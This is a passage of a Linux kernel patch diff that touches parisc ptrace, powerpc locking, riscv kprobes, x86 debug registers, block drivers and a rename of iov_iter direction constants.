+@@ -1315,6 +1315,7 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 			iodc_dbuf[i+0] = '\r';
+ 			iodc_dbuf[i+1] = '\n';
+ 			i += 2;
++			found = 1;
+ 			goto print;
+ 		default:
+ 			iodc_dbuf[i] = str[i];
+@@ -1330,7 +1331,7 @@ print:
+ 		__pa(pdc_result), 0, __pa(iodc_dbuf), i, 0);
+ 	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+-	return i;
++	return i - found;
+ }
+ 
+ #if !defined(BOOTLOADER)
+diff --git a/arch/parisc/kernel/ptrace.c b/arch/parisc/kernel/ptrace.c
+index 96ef6a6b66e56..9af11abeee4f6 100644
+--- a/arch/parisc/kernel/ptrace.c
++++ b/arch/parisc/kernel/ptrace.c
+@@ -126,6 +126,12 @@ long arch_ptrace(struct task_struct *child, long request,
+ 	unsigned long tmp;
+ 	long ret = -EIO;
+ 
++	unsigned long user_regs_struct_size = sizeof(struct user_regs_struct);
++#ifdef CONFIG_64BIT
++	if (is_compat_task())
++		user_regs_struct_size /= 2;
++#endif
++
+ 	switch (request) {
+ 
+ 	/* Read the word at location addr in the USER area.  For ptraced
+@@ -166,7 +172,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		     addr >= sizeof(struct pt_regs))
+ 			break;
+ 		if (addr == PT_IAOQ0 || addr == PT_IAOQ1) {
+-			data |= 3; /* ensure userspace privilege */
++			data |= PRIV_USER; /* ensure userspace privilege */
+ 		}
+ 		if ((addr >= PT_GR1 && addr <= PT_GR31) ||
+ 				addr == PT_IAOQ0 || addr == PT_IAOQ1 ||
+@@ -181,14 +187,14 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		return copy_regset_to_user(child,
+ 					   task_user_regset_view(current),
+ 					   REGSET_GENERAL,
+-					   0, sizeof(struct user_regs_struct),
++					   0, user_regs_struct_size,
+ 					   datap);
+ 
+ 	case PTRACE_SETREGS:	/* Set all gp regs in the child. */
+ 		return copy_regset_from_user(child,
+ 					     task_user_regset_view(current),
+ 					     REGSET_GENERAL,
+-					     0, sizeof(struct user_regs_struct),
++					     0, user_regs_struct_size,
+ 					     datap);
+ 
+ 	case PTRACE_GETFPREGS:	/* Get the child FPU state. */
+@@ -285,7 +291,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 			if (addr >= sizeof(struct pt_regs))
+ 				break;
+ 			if (addr == PT_IAOQ0+4 || addr == PT_IAOQ1+4) {
+-				data |= 3; /* ensure userspace privilege */
++				data |= PRIV_USER; /* ensure userspace privilege */
+ 			}
+ 			if (addr >= PT_FR0 && addr <= PT_FR31 + 4) {
+ 				/* Special case, fp regs are 64 bits anyway */
+@@ -302,6 +308,11 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 			}
+ 		}
+ 		break;
++	case PTRACE_GETREGS:
++	case PTRACE_SETREGS:
++	case PTRACE_GETFPREGS:
++	case PTRACE_SETFPREGS:
++		return arch_ptrace(child, request, addr, data);
+ 
+ 	default:
+ 		ret = compat_ptrace_request(child, request, addr, data);
+@@ -483,7 +494,7 @@ static void set_reg(struct pt_regs *regs, int num, unsigned long val)
+ 	case RI(iaoq[0]):
+ 	case RI(iaoq[1]):
+ 			/* set 2 lowest bits to ensure userspace privilege: */
+-			regs->iaoq[num - RI(iaoq[0])] = val | 3;
++			regs->iaoq[num - RI(iaoq[0])] = val | PRIV_USER;
+ 			return;
+ 	case RI(sar):	regs->sar = val;
+ 			return;
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index 77fa88c2aed0d..0b7d01d408ac8 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -192,7 +192,7 @@ static inline void arch_local_irq_enable(void)
+ 
+ static inline unsigned long arch_local_irq_save(void)
+ {
+-	return irq_soft_mask_set_return(IRQS_DISABLED);
++	return irq_soft_mask_or_return(IRQS_DISABLED);
+ }
+ 
+ static inline bool arch_irqs_disabled_flags(unsigned long flags)
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index cac727b017999..5a2384ed17279 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -262,6 +262,17 @@ print_mapping(unsigned long start, unsigned long end, unsigned long size, bool e
+ static unsigned long next_boundary(unsigned long addr, unsigned long end)
+ {
+ #ifdef CONFIG_STRICT_KERNEL_RWX
++	unsigned long stext_phys;
++
++	stext_phys = __pa_symbol(_stext);
++
++	// Relocatable kernel running at non-zero real address
++	if (stext_phys != 0) {
++		// Start of relocated kernel text is a rodata boundary
++		if (addr < stext_phys)
++			return stext_phys;
++	}
++
+ 	if (addr < __pa_symbol(__srwx_boundary))
+ 		return __pa_symbol(__srwx_boundary);
+ #endif
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index 100e97daf76ba..9d229ef7f86ef 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -22,7 +22,7 @@
+  * Used to avoid races in counting the nest-pmu units during hotplug
+  * register and unregister
+  */
+-static DEFINE_SPINLOCK(nest_init_lock);
++static DEFINE_MUTEX(nest_init_lock);
+ static DEFINE_PER_CPU(struct imc_pmu_ref *, local_nest_imc_refc);
+ static struct imc_pmu **per_nest_pmu_arr;
+ static cpumask_t nest_imc_cpumask;
+@@ -1629,7 +1629,7 @@ static void imc_common_mem_free(struct imc_pmu *pmu_ptr)
+ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ {
+ 	if (pmu_ptr->domain == IMC_DOMAIN_NEST) {
+-		spin_lock(&nest_init_lock);
++		mutex_lock(&nest_init_lock);
+ 		if (nest_pmus == 1) {
+ 			cpuhp_remove_state(CPUHP_AP_PERF_POWERPC_NEST_IMC_ONLINE);
+ 			kfree(nest_imc_refc);
+@@ -1639,7 +1639,7 @@ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ 
+ 		if (nest_pmus > 0)
+ 			nest_pmus--;
+-		spin_unlock(&nest_init_lock);
++		mutex_unlock(&nest_init_lock);
+ 	}
+ 
+ 	/* Free core_imc memory */
+@@ -1796,11 +1796,11 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 		* rest. To handle the cpuhotplug callback unregister, we track
+ 		* the number of nest pmus in "nest_pmus".
+ 		*/
+-		spin_lock(&nest_init_lock);
++		mutex_lock(&nest_init_lock);
+ 		if (nest_pmus == 0) {
+ 			ret = init_nest_pmu_ref();
+ 			if (ret) {
+-				spin_unlock(&nest_init_lock);
++				mutex_unlock(&nest_init_lock);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+ 				goto err_free_mem;
+@@ -1808,7 +1808,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			/* Register for cpu hotplug notification. */
+ 			ret = nest_pmu_cpumask_init();
+ 			if (ret) {
+-				spin_unlock(&nest_init_lock);
++				mutex_unlock(&nest_init_lock);
+ 				kfree(nest_imc_refc);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+@@ -1816,7 +1816,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			}
+ 		}
+ 		nest_pmus++;
+-		spin_unlock(&nest_init_lock);
++		mutex_unlock(&nest_init_lock);
+ 		break;
+ 	case IMC_DOMAIN_CORE:
+ 		ret = core_imc_pmu_cpumask_init();
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 0d13b597cb55f..c8187867c5f47 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -80,6 +80,9 @@ ifeq ($(CONFIG_PERF_EVENTS),y)
+         KBUILD_CFLAGS += -fno-omit-frame-pointer
+ endif
+ 
++# Avoid generating .eh_frame sections.
++KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/kernel/probes/kprobes.c b/arch/riscv/kernel/probes/kprobes.c
+index e6e950b7cf327..388ecada500c1 100644
+--- a/arch/riscv/kernel/probes/kprobes.c
++++ b/arch/riscv/kernel/probes/kprobes.c
+@@ -48,6 +48,21 @@ static void __kprobes arch_simulate_insn(struct kprobe *p, struct pt_regs *regs)
+ 	post_kprobe_handler(p, kcb, regs);
+ }
+ 
++static bool __kprobes arch_check_kprobe(struct kprobe *p)
++{
++	unsigned long tmp  = (unsigned long)p->addr - p->offset;
++	unsigned long addr = (unsigned long)p->addr;
++
++	while (tmp <= addr) {
++		if (tmp == addr)
++			return true;
++
++		tmp += GET_INSN_LENGTH(*(u16 *)tmp);
++	}
++
++	return false;
++}
++
+ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ {
+ 	unsigned long probe_addr = (unsigned long)p->addr;
+@@ -55,6 +70,9 @@ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ 	if (probe_addr & 0x1)
+ 		return -EILSEQ;
+ 
++	if (!arch_check_kprobe(p))
++		return -EILSEQ;
++
+ 	/* copy instruction */
+ 	p->opcode = *p->addr;
+ 
+diff --git a/arch/s390/kernel/crash_dump.c b/arch/s390/kernel/crash_dump.c
+index e4ef67e4da0a8..c13b1455ec8ca 100644
+--- a/arch/s390/kernel/crash_dump.c
++++ b/arch/s390/kernel/crash_dump.c
+@@ -153,7 +153,7 @@ int copy_oldmem_kernel(void *dst, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dst;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 	if (copy_oldmem_iter(&iter, src, count) < count)
+ 		return -EFAULT;
+ 	return 0;
+diff --git a/arch/s390/mm/maccess.c b/arch/s390/mm/maccess.c
+index 1571cdcb0c50c..4824d1cd33d87 100644
+--- a/arch/s390/mm/maccess.c
++++ b/arch/s390/mm/maccess.c
+@@ -128,7 +128,7 @@ int memcpy_real(void *dest, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dest;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 	if (memcpy_real_iter(&iter, src, count) < count)
+ 		return -EFAULT;
+ 	return 0;
+diff --git a/arch/x86/Makefile b/arch/x86/Makefile
+index 415a5d138de47..3419ffa2a3507 100644
+--- a/arch/x86/Makefile
++++ b/arch/x86/Makefile
+@@ -14,13 +14,13 @@ endif
+ 
+ ifdef CONFIG_CC_IS_GCC
+ RETPOLINE_CFLAGS	:= $(call cc-option,-mindirect-branch=thunk-extern -mindirect-branch-register)
+-RETPOLINE_CFLAGS	+= $(call cc-option,-mindirect-branch-cs-prefix)
+ RETPOLINE_VDSO_CFLAGS	:= $(call cc-option,-mindirect-branch=thunk-inline -mindirect-branch-register)
+ endif
+ ifdef CONFIG_CC_IS_CLANG
+ RETPOLINE_CFLAGS	:= -mretpoline-external-thunk
+ RETPOLINE_VDSO_CFLAGS	:= -mretpoline
+ endif
++RETPOLINE_CFLAGS	+= $(call cc-option,-mindirect-branch-cs-prefix)
+ 
+ ifdef CONFIG_RETHUNK
+ RETHUNK_CFLAGS		:= -mfunction-return=thunk-extern
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 1b92bf05fd652..5a1d0ea402e41 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -6342,6 +6342,7 @@ __init int intel_pmu_init(void)
+ 		break;
+ 
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 		pmem = true;
+ 		x86_pmu.late_ack = true;
+ 		memcpy(hw_cache_event_ids, spr_hw_cache_event_ids, sizeof(hw_cache_event_ids));
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index 3019fb1926e35..551741e79e038 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -677,6 +677,7 @@ static const struct x86_cpu_id intel_cstates_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,		&icx_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_D,		&icx_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&icx_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&icx_cstates),
+ 
+ 	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L,		&icl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE,		&icl_cstates),
+diff --git a/arch/x86/include/asm/debugreg.h b/arch/x86/include/asm/debugreg.h
+index cfdf307ddc012..9ed8343c9b3cb 100644
+--- a/arch/x86/include/asm/debugreg.h
++++ b/arch/x86/include/asm/debugreg.h
+@@ -39,7 +39,20 @@ static __always_inline unsigned long native_get_debugreg(int regno)
+ 		asm("mov %%db6, %0" :"=r" (val));
+ 		break;
+ 	case 7:
+-		asm("mov %%db7, %0" :"=r" (val));
++		/*
++		 * Apply __FORCE_ORDER to DR7 reads to forbid re-ordering them
++		 * with other code.
++		 *
++		 * This is needed because a DR7 access can cause a #VC exception
++		 * when running under SEV-ES. Taking a #VC exception is not a
++		 * safe thing to do just anywhere in the entry code and
++		 * re-ordering might place the access into an unsafe location.
++		 *
++		 * This happened in the NMI handler, where the DR7 read was
++		 * re-ordered to happen before the call to sev_es_ist_enter(),
++		 * causing stack recursion.
++		 */
++		asm volatile("mov %%db7, %0" : "=r" (val) : __FORCE_ORDER);
+ 		break;
+ 	default:
+ 		BUG();
+@@ -66,7 +79,16 @@ static __always_inline void native_set_debugreg(int regno, unsigned long value)
+ 		asm("mov %0, %%db6"	::"r" (value));
+ 		break;
+ 	case 7:
+-		asm("mov %0, %%db7"	::"r" (value));
++		/*
++		 * Apply __FORCE_ORDER to DR7 writes to forbid re-ordering them
++		 * with other code.
++		 *
++		 * While is didn't happen with a DR7 write (see the DR7 read
++		 * comment above which explains where it happened), add the
++		 * __FORCE_ORDER here too to avoid similar problems in the
++		 * future.
++		 */
++		asm volatile("mov %0, %%db7"	::"r" (value), __FORCE_ORDER);
+ 		break;
+ 	default:
+ 		BUG();
+diff --git a/arch/x86/kernel/cpu/aperfmperf.c b/arch/x86/kernel/cpu/aperfmperf.c
+index 1f60a2b279368..fdbb5f07448fa 100644
+--- a/arch/x86/kernel/cpu/aperfmperf.c
++++ b/arch/x86/kernel/cpu/aperfmperf.c
+@@ -330,7 +330,16 @@ static void __init bp_init_freq_invariance(void)
+ 
+ static void disable_freq_invariance_workfn(struct work_struct *work)
+ {
++	int cpu;
++
+ 	static_branch_disable(&arch_scale_freq_key);
++
++	/*
++	 * Set arch_freq_scale to a default value on all cpus
++	 * This negates the effect of scaling
++	 */
++	for_each_possible_cpu(cpu)
++		per_cpu(arch_freq_scale, cpu) = SCHED_CAPACITY_SCALE;
+ }
+ 
+ static DECLARE_WORK(disable_freq_invariance_work,
+diff --git a/arch/x86/kernel/cpu/microcode/intel.c b/arch/x86/kernel/cpu/microcode/intel.c
+index 048e38ec99e71..1def66118b03c 100644
+--- a/arch/x86/kernel/cpu/microcode/intel.c
++++ b/arch/x86/kernel/cpu/microcode/intel.c
+@@ -902,7 +902,7 @@ static enum ucode_state request_microcode_fw(int cpu, struct device *device,
+ 
+ 	kvec.iov_base = (void *)firmware->data;
+ 	kvec.iov_len = firmware->size;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, firmware->size);
++	iov_iter_kvec(&iter, ITER_SOURCE, &kvec, 1, firmware->size);
+ 	ret = generic_load_microcode(cpu, &iter);
+ 
+ 	release_firmware(firmware);
+diff --git a/arch/x86/kernel/crash_dump_64.c b/arch/x86/kernel/crash_dump_64.c
+index e75bc2f217ffe..32d710f7eb84c 100644
+--- a/arch/x86/kernel/crash_dump_64.c
++++ b/arch/x86/kernel/crash_dump_64.c
+@@ -57,7 +57,7 @@ ssize_t elfcorehdr_read(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos,
+ 				cc_platform_has(CC_ATTR_GUEST_MEM_ENCRYPT));
+diff --git a/block/bfq-cgroup.c b/block/bfq-cgroup.c
+index 7d624a3a3f0f8..60b4299bec8ec 100644
+--- a/block/bfq-cgroup.c
++++ b/block/bfq-cgroup.c
+@@ -718,15 +718,15 @@ static void *__bfq_bic_change_cgroup(struct bfq_data *bfqd,
+ 				     struct bfq_io_cq *bic,
+ 				     struct bfq_group *bfqg)
+ {
+-	struct bfq_queue *async_bfqq = bic_to_bfqq(bic, 0);
+-	struct bfq_queue *sync_bfqq = bic_to_bfqq(bic, 1);
++	struct bfq_queue *async_bfqq = bic_to_bfqq(bic, false);
++	struct bfq_queue *sync_bfqq = bic_to_bfqq(bic, true);
+ 	struct bfq_entity *entity;
+ 
+ 	if (async_bfqq) {
+ 		entity = &async_bfqq->entity;
+ 
+ 		if (entity->sched_data != &bfqg->sched_data) {
+-			bic_set_bfqq(bic, NULL, 0);
++			bic_set_bfqq(bic, NULL, false);
+ 			bfq_release_process_ref(bfqd, async_bfqq);
+ 		}
+ 	}
+@@ -761,8 +761,8 @@ static void *__bfq_bic_change_cgroup(struct bfq_data *bfqd,
+ 				 * request from the old cgroup.
+ 				 */
+ 				bfq_put_cooperator(sync_bfqq);
++				bic_set_bfqq(bic, NULL, true);
+ 				bfq_release_process_ref(bfqd, sync_bfqq);
+-				bic_set_bfqq(bic, NULL, 1);
+ 			}
+ 		}
+ 	}
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 7b894df32e320..ff9d238894157 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -3180,7 +3180,7 @@ bfq_merge_bfqqs(struct bfq_data *bfqd, struct bfq_io_cq *bic,
+ 	/*
+ 	 * Merge queues (that is, let bic redirect its requests to new_bfqq)
+ 	 */
+-	bic_set_bfqq(bic, new_bfqq, 1);
++	bic_set_bfqq(bic, new_bfqq, true);
+ 	bfq_mark_bfqq_coop(new_bfqq);
+ 	/*
+ 	 * new_bfqq now belongs to at least two bics (it is a shared queue):
+@@ -5491,9 +5491,11 @@ static void bfq_check_ioprio_change(struct bfq_io_cq *bic, struct bio *bio)
+ 
+ 	bfqq = bic_to_bfqq(bic, false);
+ 	if (bfqq) {
+-		bfq_release_process_ref(bfqd, bfqq);
++		struct bfq_queue *old_bfqq = bfqq;
++
+ 		bfqq = bfq_get_queue(bfqd, bio, false, bic, true);
+ 		bic_set_bfqq(bic, bfqq, false);
++		bfq_release_process_ref(bfqd, old_bfqq);
+ 	}
+ 
+ 	bfqq = bic_to_bfqq(bic, true);
+@@ -6627,7 +6629,7 @@ bfq_split_bfqq(struct bfq_io_cq *bic, struct bfq_queue *bfqq)
+ 		return bfqq;
+ 	}
+ 
+-	bic_set_bfqq(bic, NULL, 1);
++	bic_set_bfqq(bic, NULL, true);
+ 
+ 	bfq_put_cooperator(bfqq);
+ 
+diff --git a/certs/Makefile b/certs/Makefile
+index 9486ed924731b..799ad7b9e68a0 100644
+--- a/certs/Makefile
++++ b/certs/Makefile
+@@ -23,8 +23,8 @@ $(obj)/blacklist_hash_list: $(CONFIG_SYSTEM_BLACKLIST_HASH_LIST) FORCE
+ targets += blacklist_hash_list
+ 
+ quiet_cmd_extract_certs  = CERT    $@
+-      cmd_extract_certs  = $(obj)/extract-cert $(extract-cert-in) $@
+-extract-cert-in = $(or $(filter-out $(obj)/extract-cert, $(real-prereqs)),"")
++      cmd_extract_certs  = $(obj)/extract-cert "$(extract-cert-in)" $@
++extract-cert-in = $(filter-out $(obj)/extract-cert, $(real-prereqs))
+ 
+ $(obj)/system_certificates.o: $(obj)/x509_certificate_list
+ 
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index bcd059caa1c81..814d2dc87d7e8 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -766,7 +766,7 @@ static int build_cipher_test_sglists(struct cipher_test_sglists *tsgls,
+ 	struct iov_iter input;
+ 	int err;
+ 
+-	iov_iter_kvec(&input, WRITE, inputs, nr_inputs, src_total_len);
++	iov_iter_kvec(&input, ITER_SOURCE, inputs, nr_inputs, src_total_len);
+ 	err = build_test_sglist(&tsgls->src, cfg->src_divs, alignmask,
+ 				cfg->inplace_mode != OUT_OF_PLACE ?
+ 					max(dst_total_len, src_total_len) :
+@@ -1180,7 +1180,7 @@ static int build_hash_sglist(struct test_sglist *tsgl,
+ 
+ 	kv.iov_base = (void *)vec->plaintext;
+ 	kv.iov_len = vec->psize;
+-	iov_iter_kvec(&input, WRITE, &kv, 1, vec->psize);
++	iov_iter_kvec(&input, ITER_SOURCE, &kv, 1, vec->psize);
+ 	return build_test_sglist(tsgl, cfg->src_divs, alignmask, vec->psize,
+ 				 &input, divs);
+ }
+diff --git a/drivers/acpi/pfr_update.c b/drivers/acpi/pfr_update.c
+index 9d2bdc13253a5..98267f163e2bd 100644
+--- a/drivers/acpi/pfr_update.c
++++ b/drivers/acpi/pfr_update.c
+@@ -455,7 +455,7 @@ static ssize_t pfru_write(struct file *file, const char __user *buf,
+ 
+ 	iov.iov_base = (void __user *)buf;
+ 	iov.iov_len = len;
+-	iov_iter_init(&iter, WRITE, &iov, 1, len);
++	iov_iter_init(&iter, ITER_SOURCE, &iov, 1, len);
+ 
+ 	/* map the communication buffer */
+ 	phy_addr = (phys_addr_t)((buf_info.addr_hi << 32) | buf_info.addr_lo);
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index d3ce5c383f3a7..26a75f5cce95b 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -3108,7 +3108,7 @@ int sata_down_spd_limit(struct ata_link *link, u32 spd_limit)
+ 	 */
+ 	if (spd > 1)
+ 		mask &= (1 << (spd - 1)) - 1;
+-	else
++	else if (link->sata_spd)
+ 		return -EINVAL;
+ 
+ 	/* were we already at the bottom? */
+diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
+index 6772402326842..590d1b50ab5d6 100644
+--- a/drivers/block/drbd/drbd_main.c
++++ b/drivers/block/drbd/drbd_main.c
+@@ -1816,7 +1816,7 @@ int drbd_send(struct drbd_connection *connection, struct socket *sock,
+ 
+ 	/* THINK  if (signal_pending) return ... ? */
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iov, 1, size);
+ 
+ 	if (sock == connection->data.socket) {
+ 		rcu_read_lock();
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index ee69d50ba4fd3..54010eac6ca91 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -507,7 +507,7 @@ static int drbd_recv_short(struct socket *sock, void *buf, size_t size, int flag
+ 	struct msghdr msg = {
+ 		.msg_flags = (flags ? flags : MSG_WAITALL | MSG_NOSIGNAL)
+ 	};
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, size);
+ 	return sock_recvmsg(sock, &msg, msg.msg_flags);
+ }
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index d12d3d171ec4c..df628e30bca41 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -243,7 +243,7 @@ static int lo_write_bvec(struct file *file, struct bio_vec *bvec, loff_t *ppos)
+ 	struct iov_iter i;
+ 	ssize_t bw;
+ 
+-	iov_iter_bvec(&i, WRITE, bvec, 1, bvec->bv_len);
++	iov_iter_bvec(&i, ITER_SOURCE, bvec, 1, bvec->bv_len);
+ 
+ 	file_start_write(file);
+ 	bw = vfs_iter_write(file, &i, ppos, 0);
+@@ -286,7 +286,7 @@ static int lo_read_simple(struct loop_device *lo, struct request *rq,
+ 	ssize_t len;
+ 
+ 	rq_for_each_segment(bvec, rq, iter) {
+-		iov_iter_bvec(&i, READ, &bvec, 1, bvec.bv_len);
++		iov_iter_bvec(&i, ITER_DEST, &bvec, 1, bvec.bv_len);
+ 		len = vfs_iter_read(lo->lo_backing_file, &i, &pos, 0);
+ 		if (len < 0)
+ 			return len;
+@@ -392,7 +392,7 @@ static void lo_rw_aio_complete(struct kiocb *iocb, long ret)
+ }
+ 
+ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
+-		     loff_t pos, bool rw)
++		     loff_t pos, int rw)
+ {
+ 	struct iov_iter iter;
+ 	struct req_iterator rq_iter;
+@@ -448,7 +448,7 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
+ 	cmd->iocb.ki_flags = IOCB_DIRECT;
+ 	cmd->iocb.ki_ioprio = IOPRIO_PRIO_VALUE(IOPRIO_CLASS_NONE, 0);
+ 
+-	if (rw == WRITE)
++	if (rw == ITER_SOURCE)
+ 		ret = call_write_iter(file, &cmd->iocb, &iter);
+ 	else
+ 		ret = call_read_iter(file, &cmd->iocb, &iter);
+@@ -490,12 +490,12 @@ static int do_req_filebacked(struct loop_device *lo, struct request *rq)
+ 		return lo_fallocate(lo, rq, pos, FALLOC_FL_PUNCH_HOLE);
+ 	case REQ_OP_WRITE:
+ 		if (cmd->use_aio)
+-			return lo_rw_aio(lo, cmd, pos, WRITE);
++			return lo_rw_aio(lo, cmd, pos, ITER_SOURCE);
+ 		else
+ 			return lo_write_simple(lo, rq, pos);
+ 	case REQ_OP_READ:
+ 		if (cmd->use_aio)
+-			return lo_rw_aio(lo, cmd, pos, READ);
++			return lo_rw_aio(lo, cmd, pos, ITER_DEST);
+ 		else
+ 			return lo_read_simple(lo, rq, pos);
+ 	default:
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 5cffd96ef2d7d..e379ccc63c520 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -563,7 +563,7 @@ static int nbd_send_cmd(struct nbd_device *nbd, struct nbd_cmd *cmd, int index)
+ 	u32 nbd_cmd_flags = 0;
+ 	int sent = nsock->sent, skip = 0;
+ 
+-	iov_iter_kvec(&from, WRITE, &iov, 1, sizeof(request));
++	iov_iter_kvec(&from, ITER_SOURCE, &iov, 1, sizeof(request));
+ 
+ 	type = req_to_nbd_cmd_type(req);
+ 	if (type == U32_MAX)
+@@ -649,7 +649,7 @@ send_pages:
+ 
+ 			dev_dbg(nbd_to_dev(nbd), "request %p: sending %d bytes data\n",
+ 				req, bvec.bv_len);
+-			iov_iter_bvec(&from, WRITE, &bvec, 1, bvec.bv_len);
++			iov_iter_bvec(&from, ITER_SOURCE, &bvec, 1, bvec.bv_len);
+ 			if (skip) {
+ 				if (skip >= iov_iter_count(&from)) {
+ 					skip -= iov_iter_count(&from);
+@@ -701,7 +701,7 @@ static int nbd_read_reply(struct nbd_device *nbd, int index,
+ 	int result;
+ 
+ 	reply->magic = 0;
+-	iov_iter_kvec(&to, READ, &iov, 1, sizeof(*reply));
++	iov_iter_kvec(&to, ITER_DEST, &iov, 1, sizeof(*reply));
+ 	result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
+ 	if (result < 0) {
+ 		if (!nbd_disconnected(nbd->config))
+@@ -790,7 +790,7 @@ static struct nbd_cmd *nbd_handle_reply(struct nbd_device *nbd, int index,
+ 		struct iov_iter to;
+ 
+ 		rq_for_each_segment(bvec, req, iter) {
+-			iov_iter_bvec(&to, READ, &bvec, 1, bvec.bv_len);
++			iov_iter_bvec(&to, ITER_DEST, &bvec, 1, bvec.bv_len);
+ 			result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
+ 			if (result < 0) {
+ 				dev_err(disk_to_dev(nbd->disk), "Receive data failed (result %d)\n",
+@@ -1267,7 +1267,7 @@ static void send_disconnects(struct nbd_device *nbd)
+ 	for (i = 0; i < config->num_connections; i++) {
+ 		struct nbd_sock *nsock = config->socks[i];
+ 
+-		iov_iter_kvec(&from, WRITE, &iov, 1, sizeof(request));
++		iov_iter_kvec(&from, ITER_SOURCE, &iov, 1, sizeof(request));
+ 		mutex_lock(&nsock->tx_lock);
+ 		ret = sock_xmit(nbd, i, 1, &from, 0, NULL);
+ 		if (ret < 0)
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index e546932046309..6368b56eacf11 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -137,7 +137,7 @@ struct ublk_device {
+ 
+ 	char	*__queues;
+ 
+-	unsigned short  queue_size;
++	unsigned int	queue_size;
+ 	struct ublksrv_ctrl_dev_info	dev_info;
+ 
+ 	struct blk_mq_tag_set	tag_set;
+diff --git a/drivers/bus/sunxi-rsb.c b/drivers/bus/sunxi-rsb.c
